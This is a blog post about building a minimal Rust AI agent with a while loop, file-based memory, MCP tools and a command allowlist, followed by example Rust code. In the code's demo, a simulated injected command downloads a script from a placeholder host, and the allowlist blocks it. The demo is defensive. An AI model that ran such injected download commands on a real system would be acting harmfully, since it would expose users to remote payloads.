I walked into this with exactly zero Rust experience and a stubborn belief: building an agent shouldn’t require a megachurch of frameworks. Twenty-four hours later, I shipped a Rust-native AI agent desktop app for non-devs that compiled to a tiny 16MB binary: a simple while loop with Skills and MCP support. And the most important part: BYOK (Bring Your Own Key) and even local models!
Call it technical minimalism.
The Stack
- Rust (from zero to shipping in one day)
- Long term memory: File system as persistent, queryable context
- Loop: A single while loop coordinating I/O and tool calls
- Tools: Built-in file tools (read, write, bash) + MCP-compliant providers (extensible)
- Sandboxing: A simple Docker container would isolate most risks.
Secret Sauce
- Keep state in plain files and directories.
- Keep orchestration in a simple loop, not a framework.
- Teach the AI to read and write its own operating context, in files.
What I learnt:
1) You don’t need an agent framework
An agent “framework” is almost always over-abstraction that adds complexity.
- Just a simple while loop:
  - Observe: read inputs, logs, and task files
  - Decide: ask the model for the next atomic action
  - Act: call a tool (MCP) or write to disk
  - Reflect: append outcomes to a local journal
2) The File System is all you need
Vector stores and RAG farms are great—until they become speculative overhead.
- Everything as Files: Tasks, plans, diffs, decisions, and logs live as plain text and JSON.
- Modern RL training methods have trained models to work super well with Linux file systems.
- Using the FS as the “long term memory” makes persistence trivial and recoverability obvious.
3) The Surreal Mirror: AI Coding reproduces itself.
Of course, I use an AI agent (Claude Code) to work for me.
Open Cowork is basically a GUI with a CC-like agent behind it. It’s super interesting to see that CC can reproduce itself in Rust.
4) Security as a First-Class Citizen
Agents are powerful, but power without boundaries is a liability. They are potentially vulnerable to bad actors, prompt injection, or even plain bugs. For non-devs, security isn’t just a feature—it’s the foundation.
By implementing hard sandboxing (like Docker) and strictly whitelisting system commands or network calls, we ensure the agent remains a helpful tool, not a system threat.
The entire codebase can be summarized in the loop below:
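As an added illustration (not the project's own code), here is a minimal Observe/Decide/Act/Reflect loop from point 1 with the command allowlist from point 4 enforced before every tool call. The `Action` enum, the `decide` closure standing in for the model call, the in-memory journal and the allowlist entries are all assumptions made for this example.

```rust
use std::process::Command;

/// Hypothetical action type; the project's real types are not shown on the page.
#[derive(Debug, Clone, PartialEq)]
pub enum Action { Bash(String), Done }

/// Assumed allowlist of programs the agent may run.
pub const ALLOWED: &[&str] = &["ls", "cat", "echo"];

/// True only for an allowlisted program name with no shell metacharacters.
/// Metacharacters are inert below (no shell is spawned) but are rejected so the
/// check still holds if Act is ever changed to go through `sh -c`.
pub fn is_allowed(cmd: &str) -> bool {
    let meta = [';', '|', '&', '$', '`', '>', '<', '(', ')', '\n', '\\'];
    !cmd.chars().any(|c| meta.contains(&c))
        && cmd.split_whitespace().next().map_or(false, |p| ALLOWED.contains(&p))
}

/// Observe -> Decide -> Act -> Reflect. `decide` stands in for the model call and
/// sees the journal so far (kept in memory here instead of a file on disk).
pub fn run_agent(mut decide: impl FnMut(&[String]) -> Action, max_steps: usize) -> Vec<String> {
    let mut journal: Vec<String> = Vec::new();
    let mut steps = 0;
    while steps < max_steps {
        steps += 1;
        match decide(&journal[..]) {
            Action::Done => { journal.push("done".to_string()); break; }
            // Gate: anything off the allowlist is refused and the refusal is journaled.
            Action::Bash(cmd) if !is_allowed(&cmd) => journal.push(format!("DENIED {cmd}")),
            Action::Bash(cmd) => {
                // Act: argv goes straight to the OS; is_allowed guarantees a first token.
                let mut argv = cmd.split_whitespace();
                let result = Command::new(argv.next().unwrap()).args(argv).output();
                let text = match result {
                    Ok(o) => String::from_utf8_lossy(&o.stdout).trim().to_string(),
                    Err(e) => format!("error: {e}"),
                };
                journal.push(format!("RAN {cmd} => {text}"));
            }
        }
    }
    journal
}

fn main() {
    // Constructed model output: one benign step, one injected download attempt.
    let mut script = vec![Action::Bash("echo hello".into()),
        Action::Bash("curl http://example.invalid/x.sh".into()), Action::Done].into_iter();
    for line in run_agent(|_| script.next().unwrap_or(Action::Done), 10) { println!("{line}"); }
}
```

Allowlisting program names does not constrain their arguments (an allowed `cat` can still read any file it can reach), which is why the allowlist is paired with a container sandbox rather than used alone.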


